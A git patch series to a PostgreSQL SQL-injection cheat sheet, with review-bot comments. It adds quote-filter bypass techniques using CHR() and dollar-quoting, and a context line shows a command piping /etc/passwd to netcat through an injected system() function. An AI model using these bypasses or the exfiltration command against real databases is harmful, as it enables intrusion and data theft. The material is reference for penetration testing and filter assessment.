From baadc6d3e9af55aef0120e342fb6120b329ee31f Mon Sep 17 00:00:00 2001 From: hloverflow Date: Sun, 12 Jul 2020 13:14:26 +0800 Subject: [PATCH 1/3] contribute PostgreSQL bypass quotes technique --- SQL Injection/PostgreSQL Injection.md | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index e25c1c5..2dafcb3 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -203,6 +203,25 @@ CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu SELECT system('cat /etc/passwd | nc '); ``` +### Bypass Filter + +#### Quotes + +Using CHR + +```sql +SELECT CHR(65)||CHR(66)||CHR(67); +``` + +Using Dollar-signs ( >= version 8 PostgreSQL) + +```sql +SELECT $$This is a string$$ +SELECT $TAG$This is another string$TAG$ +``` + + + ## References * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) @@ -210,3 +229,4 @@ SELECT system('cat /etc/passwd | nc '); * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) * [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) +* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2019 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf) From 37f66cc5239098ecad4fbeb9c2f1ba104addfd7c Mon Sep 17 00:00:00 2001 From: HLOverflow Date: Sun, 12 Jul 2020 13:17:43 +0800 Subject: [PATCH 2/3] add to table of content --- SQL Injection/PostgreSQL Injection.md | 1 + 1 file changed, 1 insertion(+) 
diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2dafcb3..5fbb10d 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -23,6 +23,7 @@ * [PostgreSQL Command execution](#postgresql-command-execution) * [CVE-2019–9193](#cve-20199193) * [Using libc.so.6](#using-libcso6) +* [Bypass Filter](#bypass-filter) * [References](#references) ## PostgreSQL Comments From 2e7b9db94bf09d5dae4c906ba539d2bb45d63210 Mon Sep 17 00:00:00 2001 From: hloverflow Date: Sun, 12 Jul 2020 13:21:18 +0800 Subject: [PATCH 3/3] Corrected Reference to 2009 paper --- SQL Injection/PostgreSQL Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 5fbb10d..18a5b90 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -230,4 +230,4 @@ SELECT $TAG$This is another string$TAG$ * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) * [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) -* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2019 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf) +* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2009 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
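Review bot: In [PATCH 1/3], hunk `@@ -203,6 +203,25 @@`, the two dollar-quoted examples `SELECT $$This is a string$$` and `SELECT $TAG$This is another string$TAG$` sit in one fenced block with no terminating semicolons, unlike the CHR example above them, so copied as-is they parse as one malformed statement; end each with `;`. The label "( >= version 8 PostgreSQL)" would read better as "(PostgreSQL >= 8.0)", the release that introduced dollar quoting. The section has no sentence saying what it demonstrates; one line stating that both forms build a string literal without a quote character, which is why stripping or escaping quotes is not a substitute for parameterized queries, would make it useful to readers assessing their own input filters. The hunk also adds three blank lines before `## References` where one is enough, and `### Bypass Filter` is a level-3 heading, so it nests under the preceding level-2 section; use `##` if it is meant to be a topic of its own.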
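Review bot: In [PATCH 1/3], hunk `@@ -210,3 +229,4 @@`, the added INFIGO reference gives the year as 2019 while its own URL names the document `INFIGO-TD-2009-04`. [PATCH 3/3] changes the year to 2009; squash that fix into this commit so the history never contains the wrong date.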
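Review bot: In [PATCH 2/3], hunk `@@ -23,6 +23,7 @@`, the table of contents gains `[Bypass Filter](#bypass-filter)` but nothing for the `#### Quotes` subsection added in 1/3, while the entries just above it (`Using libc.so.6` and its neighbour) read as subsections of the command-execution entry. Add a nested `[Quotes](#quotes)` entry for consistency, and check that the indentation of the new line matches the heading level chosen in 1/3. This one-line change belongs in the same commit as the section it indexes.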